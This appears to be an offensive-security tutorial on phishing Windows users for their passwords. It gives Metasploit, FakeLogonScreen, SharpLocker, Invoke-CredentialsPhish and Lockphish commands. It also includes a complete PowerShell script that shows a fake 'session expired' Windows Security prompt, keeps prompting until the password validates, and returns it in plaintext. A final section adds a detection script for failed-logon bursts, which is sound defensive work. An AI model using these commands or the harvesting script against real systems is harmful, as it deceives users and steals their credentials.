Stealing Windows credentials

In this article we will look at several ways of phishing a logged-on user for their password on a Windows system: a fake credential dialog, a fake lock screen, a PowerShell prompt and a browser-based lock screen.

Metasploit

Metasploit ships with a module that phishes the logged-on user for their credentials and returns them in plaintext. Since it is a post-exploitation module, it only needs to be pointed at an existing Meterpreter session. To use it, enter:

use post/windows/gather/phish_windows_credentials
set session 1
exploit

The module waits for the user to start a new process. As soon as one starts, a fake Windows Security dialog appears asking the user to enter their credentials.

When the user enters their credentials, they are displayed in the Metasploit console.

FakeLogonScreen

A similar result can be obtained with a fake lock screen. FakeLogonScreen is a tool written in C# that shows a fake Windows lock screen and returns the password in plaintext. We will run it remotely through a Meterpreter session:

upload /root/FakeLogonScreen.exe .
shell
FakeLogonScreen.exe

Once executed, it displays a simulated Windows lock screen and waits for the user to type their password.

As the user types, the tool validates the password locally or against the domain controller, and once it is accepted the credentials are printed in the console. Because the fake lock screen is an ordinary window on the user's desktop, the Meterpreter session must be running inside that user's interactive session; a process started in another session will not be visible to the user.

SharpLocker

This tool is very similar to the previous one: it also presents a fake lock screen, captures the password entered into it, and is uploaded and run from the shell in the same way.

PowerShell: Invoke-CredentialsPhish.ps1

To run the script, enter:

Import-Module C:\Users\raj\Desktop\Invoke-CredentialsPhish.ps1
Invoke-CredentialsPhish

When you run the commands above, the user is prompted for their credentials.

Once the user enters them, they are displayed on the screen.
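The behaviour that FakeLogonScreen and Invoke-CredentialsPhish share is a loop: show a credential prompt, validate the answer against the local machine or the domain, and prompt again until validation succeeds. The script below is an added example that reproduces that loop; it is not the code of either tool and not part of the original article. It assumes Windows PowerShell 5.1 in a GUI console session and the .NET Framework assembly System.DirectoryServices.AccountManagement, neither of which the article states; the function names are our own.

```powershell
# Added example (not from the original article, not the code of FakeLogonScreen or
# Invoke-CredentialsPhish): prompt for credentials and re-prompt until they validate.
# Assumptions: Windows PowerShell 5.1 in an interactive GUI session; the .NET Framework
# assembly System.DirectoryServices.AccountManagement is available.
Add-Type -AssemblyName System.DirectoryServices.AccountManagement

function Test-CredentialAgainstAuthority {
    # Validate a PSCredential against the local SAM (standalone host) or the domain.
    param(
        [Parameter(Mandatory)] [System.Management.Automation.PSCredential] $Credential,
        [bool] $DomainJoined = (Get-CimInstance Win32_ComputerSystem).PartOfDomain
    )
    $user   = $Credential.UserName
    $domain = $null
    if ($user -match '^(?<d>[^\\]+)\\(?<u>.+)$') { $domain = $Matches.d; $user = $Matches.u }

    $ctxType = [System.DirectoryServices.AccountManagement.ContextType]
    $ctx = if ($DomainJoined) {
        if ($domain) {
            New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ctxType::Domain, $domain)
        } else {
            New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ctxType::Domain)
        }
    } else {
        New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ctxType::Machine)
    }
    try {
        # ValidateCredentials returns $false for a wrong password; it only throws on setup errors
        return $ctx.ValidateCredentials($user, $Credential.GetNetworkCredential().Password)
    } finally {
        $ctx.Dispose()
    }
}

function Invoke-CredentialPrompt {
    # Keep prompting until the user supplies a password that validates, or we give up.
    param(
        [string] $Caption     = 'Windows Security',
        [string] $Message     = 'Your session has expired. Please re-enter your password.',
        [int]    $MaxAttempts = 5
    )
    $defaultUser = "$env:USERDOMAIN\$env:USERNAME"
    for ($attempt = 1; $attempt -le $MaxAttempts; $attempt++) {
        # PromptForCredential shows the native Windows Security (CredUI) dialog in a GUI host
        $cred = $Host.UI.PromptForCredential($Caption, $Message, $defaultUser, '')
        if ($null -eq $cred) { continue }   # Cancel pressed: the loop simply prompts again
        if (Test-CredentialAgainstAuthority -Credential $cred) {
            return [pscustomobject]@{
                User     = $cred.UserName
                Password = $cred.GetNetworkCredential().Password
                Attempts = $attempt
            }
        }
    }
    return $null   # user never entered a valid password
}

# Usage:
# Invoke-CredentialPrompt | Format-List
```

The validation step is what makes the result trustworthy: a value only comes back after ValidateCredentials accepted it. It is also what makes the technique noisy: every wrong guess by the victim is a real authentication failure that is recorded wherever the validation happened, on the host for local accounts or on the domain controller for domain accounts.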

Lockphish

Lockphish is another tool for obtaining credentials. Run it with the following command:

./lockphish.sh

It will generate a public link using ngrok, and this link needs to be delivered to the victim.

After the victim launches the downloaded file, the fake lock screen appears and the user is forced to enter their credentials, which are then shown in our console.

Any of these options can be used to obtain the credentials of the target system. When validated credentials are required, the PowerShell script is the most convenient, because its prompt does not close until the correct password is entered; FakeLogonScreen also validates, against the local machine or the domain controller. Each tool has its advantages and disadvantages, but all of them work.
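The validating tools above leave a defender-visible trail: while the victim mistypes, each attempt is a failed logon (Security event 4625), and the record carries the name of the process that asked for the validation. The script below is an added detection example, not part of the original article, that groups 4625 records by target user and caller process and flags bursts from a process that does not normally validate passwords. It assumes the 4625 EventData field names (TargetUserName, LogonType, ProcessName, Status); the allow-list of expected processes and the sample records are constructed for the example and would need tuning on a real estate.

```powershell
# Added detection example (not from the original article). Flags bursts of failed logons
# (event 4625) whose caller process is not one that normally validates passwords.
# Assumptions: 4625 EventData field names TargetUserName, LogonType, ProcessName, Status;
# the allow-list below and the sample records are constructed for this example.

function ConvertFrom-FailedLogonEvent {
    # Flatten a 4625 EventRecord (as returned by Get-WinEvent) into the fields we need.
    param([Parameter(Mandatory, ValueFromPipeline)] $Event)
    process {
        $xml  = [xml]$Event.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time      = $Event.TimeCreated
            User      = $data['TargetUserName']
            LogonType = [int]$data['LogonType']
            Process   = $data['ProcessName']     # "Caller Process Name" in the event viewer
            Status    = $data['Status']
        }
    }
}

function Find-PromptValidationBursts {
    param(
        [Parameter(Mandatory)] [object[]] $Failures,   # output of ConvertFrom-FailedLogonEvent
        [int] $MinFailures   = 2,
        [int] $WindowMinutes = 10,
        # Processes that legitimately validate passwords on a workstation (constructed list)
        [string[]] $ExpectedProcesses = @(
            'C:\Windows\System32\winlogon.exe',
            'C:\Windows\System32\lsass.exe',
            'C:\Windows\System32\svchost.exe',
            '-'
        )
    )
    $Failures |
        Where-Object { $_.Process -and ($ExpectedProcesses -notcontains $_.Process) } |
        Group-Object -Property User, Process |
        ForEach-Object {
            $run  = @($_.Group | Sort-Object Time)
            $span = ($run[-1].Time - $run[0].Time).TotalMinutes
            if ($run.Count -ge $MinFailures -and $span -le $WindowMinutes) {
                [pscustomobject]@{
                    User    = $run[0].User
                    Process = $run[0].Process
                    Count   = $run.Count
                    First   = $run[0].Time
                    Last    = $run[-1].Time
                }
            }
        }
}

# Constructed sample: three quick failures for 'raj' from powershell.exe (a prompt loop at
# work) and one stray failure from winlogon.exe (a normal mistype at the real lock screen).
$t0 = Get-Date '2024-03-01 09:15:00'
$ps = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$sample = @(
    [pscustomobject]@{ Time = $t0;                User = 'raj'; LogonType = 3; Process = $ps; Status = '0xC000006D' }
    [pscustomobject]@{ Time = $t0.AddSeconds(20); User = 'raj'; LogonType = 3; Process = $ps; Status = '0xC000006D' }
    [pscustomobject]@{ Time = $t0.AddSeconds(45); User = 'raj'; LogonType = 3; Process = $ps; Status = '0xC000006D' }
    [pscustomobject]@{ Time = $t0.AddMinutes(30); User = 'raj'; LogonType = 2; Process = 'C:\Windows\System32\winlogon.exe'; Status = '0xC000006D' }
)
Find-PromptValidationBursts -Failures $sample | Format-Table -AutoSize

# Against a live Security log:
# Find-PromptValidationBursts -Failures (Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} | ConvertFrom-FailedLogonEvent)
```

On the sample the powershell.exe run is reported and the single winlogon.exe failure is not. For domain accounts the same logic should be run on the domain controller's log rather than the workstation's, since that is where the validation takes place.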
